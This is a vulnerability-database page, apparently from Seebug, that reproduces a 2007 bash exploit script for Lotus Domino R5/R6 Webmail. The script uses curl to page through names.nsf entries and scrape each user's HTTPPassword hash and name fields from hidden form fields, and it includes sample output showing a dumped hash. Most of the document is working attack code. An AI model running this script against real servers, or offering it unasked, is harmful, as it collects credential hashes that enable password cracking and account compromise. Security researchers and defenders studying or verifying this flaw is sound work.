Lucene search

K
seebugRootSSV:64478
HistoryJul 01, 2014 - 12:00 a.m.

Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit

2014-07-0100:00:00
Root
www.seebug.org
43

0.012 Low

EPSS

Percentile

85.2%

No description provided by source.


                                                #!/bin/bash

#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi &#60;[email protected]&#62;
#
# Lotus Domino R5 and R6 WebMail, with &#34;Generate HTML for all fields&#34; enabled, 
# stores sensitive data from names.nsf in hidden form fields, which allows 
# remote attackers to read the HTML source to obtain sensitive information such 
# as (1) the password hash in the HTTPPassword field, (2) the password change 
# date in the HTTPPasswordChangeDate field, (3) the client platform in the 
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and 
# (5) the client Lotus Domino release in the ClntBld field, a different 
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it&#39;s possible to dump all HTTPPassword hashes using the 
# $defaultview view instead of $users. This saves a considerable amount of time.
# 
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName:      Foo
# LastName:       Bar
# ShortName:      fbar
# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#

# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp

# Command line
host=$1

# Local fuctions
function header() {
	echo &#34;&#34;
	echo &#34;raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump&#34;
	echo &#34;Copyright (c) 2007 Marco Ivaldi &#60;[email protected]&#62;&#34;
	echo &#34;&#34;
}

function footer() {
	echo &#34;&#34;
	exit 0
}

function usage() {
	header
	echo &#34;usage  : ./raptor_dominohash &#60;host&#62;&#34;
	echo &#34;example: ./raptor_dominohash 192.168.0.202&#34;
	footer
}

function notfound() {
	header
	echo &#34;error  : curl not found&#34;
	footer
}

# Check if curl is there
curl=`which curl 2&#62;/dev/null`
if [ $? -ne 0 ]; then
	notfound
fi

# Input control
if [ -z &#34;$1&#34;  ]; then
	usage
fi

# Remove temporary files
rm -f $tmp1
rm -f $tmp2

header

# Extract the view entries
echo &#34;Extracting the view entries...&#34;
while :
do
	curl &#34;http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}&#34; 2&#62;/dev/null | grep unid &#62;&#62; $tmp1

	# Check grep return value
	if [ $? -ne 0 ]; then
		break
	fi

	# Go for the next page
	i=`expr $i + 30`
	echo -ne &#34;\b\b\b\b\b\b\b\b$i&#34;
done

cat $tmp1 | awk -F&#39;unid=&#34;&#39; &#39;{print $2}&#39; | awk -F&#39;&#34;&#39; &#39;{print $1}&#39; | sort | uniq &#62; $tmp2

# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
	echo &#34;No entries found on host ${host}!&#34;
	footer
fi
echo -ne &#34;\b\b\b\b\b\b\b\bDone! &#34;
echo &#34;`wc -l ${tmp2} | awk &#39;{print $1}&#39;` unique entries have been found.&#34;
echo &#34;&#34;

# Perform the hash dumping
echo &#34;Now ready to dump password hashes...&#34;
echo &#34;&#34;
sleep 4
for unid in `cat $tmp2`
do
	echo &#34;[http://${host}/names.nsf/\$defaultview/${unid}]&#34;
	echo &#34;&#34;
	#curl &#34;http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument&#34; 2&#62;/dev/null | egrep &#39;&#34;FullName&#34;|&#34;HTTPPassword&#34;&#39;
	curl &#34;http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument&#34; 2&#62;/dev/null | egrep &#39;&#34;FirstName&#34;|&#34;LastName&#34;|&#34;ShortName&#34;|&#34;HTTPPassword&#34;&#39; | awk -F&#39;input name=&#34;&#39; &#39;{print $2}&#39; | awk -F&#39;&#34; type=&#34;hidden&#34; value=&#34;&#39; &#39;{print $1 &#34;:\t&#34; $2}&#39; | tr -d &#39;&#34;&#62;&#39;
	echo &#34;&#34;
done

footer

# milw0rm.com [2007-02-13]